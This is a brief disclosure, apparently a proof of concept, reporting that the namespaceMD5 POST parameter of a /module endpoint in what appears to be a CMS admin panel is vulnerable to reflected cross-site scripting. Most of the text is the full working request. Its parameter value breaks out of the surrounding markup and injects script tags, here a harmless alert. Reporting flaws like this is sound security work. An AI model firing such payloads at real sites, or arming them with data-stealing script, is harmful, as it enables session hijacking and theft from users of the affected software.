The POST parameter namespaceMD5
is vulnerable to reflected XSS.
// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content